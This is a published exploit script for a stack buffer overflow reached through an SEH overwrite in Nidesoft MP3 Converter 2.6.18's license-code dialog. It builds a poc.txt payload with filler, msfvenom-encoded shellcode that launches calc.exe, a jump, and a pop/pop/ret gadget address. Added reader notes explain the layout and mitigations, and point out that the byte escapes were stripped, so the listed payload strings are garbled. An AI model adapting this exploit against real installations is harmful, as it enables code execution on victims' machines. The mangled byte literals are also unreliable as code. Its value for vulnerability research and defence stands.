Nidesoft MP3 Converter 2.6.18 Buffer Overflow
Posted on 15 December 2016
#!python
#####################################################################################
# Exploit title: MP3 converter v 2.6.18 License code SEH exploit
# Date: 2016-12-15
# Vendor homepage: http://www.nidesoft.com/mp3-converter.html
# Download: http://www.nidesoft.com/downloads/mp3-converter.exe
# Tested on: Win7 SP1
# Author: malwrforensics
# Details: Launch program and enter the license code in the "Register" window
# Copy&Paste the "license" from poc.txt
#####################################################################################
#
# Reader notes (not part of the original listing):
# - This is a proof-of-concept generator: it writes one file (poc.txt) and does
#   nothing else. The crash itself is triggered by pasting that file's content
#   into the application's "Register" dialog, as the header above states.
# - Every string literal below is written as 'x41', "x89xe0..." etc. with no
#   backslashes, so as listed they are ordinary ASCII text, not byte escapes;
#   e.g. 'x41' * 0x176c is a 3-character literal repeated, i.e. 3 * 0x176c
#   characters. Presumably the escapes were lost when the page was extracted
#   (left byte-identical here).
# - Offsets and the handler address are specific to the build and OS named in
#   the header; the author's comment attributes the handler address to
#   avcodec.dll. From a defensive standpoint this describes an unchecked-length
#   copy of user-supplied text (the license field) into a stack buffer, reached
#   through an SEH overwrite; the usual mitigations (SafeSEH/SEHOP, DEP, ASLR on
#   all loaded modules) and input-length validation in the registration code
#   are what would break it - none of that is verifiable from this listing.
# - Written for Python 2: a str is written to a handle opened in 'wb' mode,
#   which raises TypeError on Python 3.


def write_poc(fname, buffer):
    """Write `buffer` verbatim to the file `fname` (created/truncated, binary mode).

    Args:
        fname: path of the output file.
        buffer: the data to write (a str under Python 2; the name shadows the
            Python 2 builtin `buffer`, which is harmless here).

    Returns:
        None.

    Raises:
        IOError/OSError if the file cannot be opened or written.
    """
    # NOTE(review): the handle is closed only on the success path; a
    # `with open(fname, 'wb') as fhandle:` block would close it on error too.
    fhandle = open(fname , 'wb')
    fhandle.write(buffer)
    fhandle.close()


fname="poc.txt"

# Filler preceding the SEH record (see the note above on the literal's length).
buf = 'x41' * 0x176c

###################################
# Payload as generated by the author with:
#   msfvenom --payload windows/exec cmd=calc.exe --platform windows
#            -f python -e x86/alpha_mixed
# i.e. an alphanumeric-encoded "launch calc.exe" stub used purely as a
# visible marker that control flow was redirected.
##################################
shellcode = ""
shellcode += "x89xe0xdaxdcxd9x70xf4x59x49x49x49x49x49"
shellcode += "x49x49x49x49x49x49x43x43x43x43x43x43x37"
shellcode += "x51x5ax6ax41x58x50x30x41x30x41x6bx41x41"
shellcode += "x51x32x41x42x32x42x42x30x42x42x41x42x58"
shellcode += "x50x38x41x42x75x4ax49x39x6cx58x68x4dx52"
shellcode += "x37x70x63x30x33x30x75x30x4bx39x59x75x45"
shellcode += "x61x79x50x70x64x4cx4bx42x70x36x50x4cx4b"
shellcode += "x42x72x66x6cx6ex6bx66x32x66x74x6cx4bx74"
shellcode += "x32x37x58x34x4fx4dx67x61x5ax45x76x75x61"
shellcode += "x69x6fx4ex4cx77x4cx43x51x63x4cx54x42x66"
shellcode += "x4cx75x70x39x51x48x4fx46x6dx67x71x4bx77"
shellcode += "x7ax42x48x72x63x62x30x57x6ex6bx51x42x74"
shellcode += "x50x4cx4bx61x5ax77x4cx6cx4bx52x6cx57x61"
shellcode += "x62x58x7ax43x53x78x45x51x68x51x43x61x4c"
shellcode += "x4bx72x79x55x70x56x61x38x53x4ex6bx67x39"
shellcode += "x46x78x5ax43x65x6ax37x39x4cx4bx36x54x6e"
shellcode += "x6bx57x71x7ax76x44x71x49x6fx6ex4cx6fx31"
shellcode += "x58x4fx36x6dx56x61x48x47x66x58x39x70x73"
shellcode += "x45x69x66x66x63x53x4dx5ax58x47x4bx53x4d"
shellcode += "x65x74x34x35x6dx34x70x58x6cx4bx61x48x35"
shellcode += "x74x53x31x69x43x65x36x4ex6bx74x4cx30x4b"
shellcode += "x4cx4bx46x38x67x6cx35x51x48x53x6ex6bx35"
shellcode += "x54x6ex6bx65x51x7ax70x4fx79x37x34x45x74"
shellcode += "x75x74x43x6bx33x6bx33x51x73x69x51x4ax36"
shellcode += "x31x6bx4fx39x70x51x4fx43x6fx73x6ax6ex6b"
shellcode += "x54x52x6ax4bx4ex6dx53x6dx51x7ax77x71x4c"
shellcode += "x4dx6cx45x4ex52x53x30x47x70x75x50x52x70"
shellcode += "x45x38x54x71x4ex6bx70x6fx6ex67x39x6fx58"
shellcode += "x55x4dx6bx4ax50x78x35x4dx72x36x36x43x58"
shellcode += "x79x36x7ax35x6fx4dx4dx4dx4bx4fx79x45x37"
shellcode += "x4cx77x76x51x6cx75x5ax6bx30x79x6bx49x70"
shellcode += "x62x55x37x75x6dx6bx61x57x35x43x74x32x52"
shellcode += "x4fx30x6ax55x50x31x43x4bx4fx69x45x32x43"
shellcode += "x43x51x32x4cx50x63x34x6ex61x75x62x58x50"
shellcode += "x65x67x70x41x41"

# Padding between the SEH record and the payload.
junk = 'x41' * 0x1e

# Placed first in the record below, i.e. in the "next SEH" slot; per the author
# this is a short jump over the handler address into `junk`/`shellcode`.
jmp = 'xebx20x41x41'

# Placed second, i.e. in the handler slot. Despite the name, the author's
# comment describes it as the pop/pop/ret gadget address, not the next-SEH
# pointer - the two variable names look swapped relative to the usual terms.
nseh = 'x37x27x78x66' #pop pop ret -> avcodec.dll

# Final layout: filler | next-SEH (jmp) | handler (nseh) | pad | payload.
buffer = buf + jmp + nseh + junk + shellcode

# Side effect on import/run: writes poc.txt in the current directory.
write_poc(fname, buffer)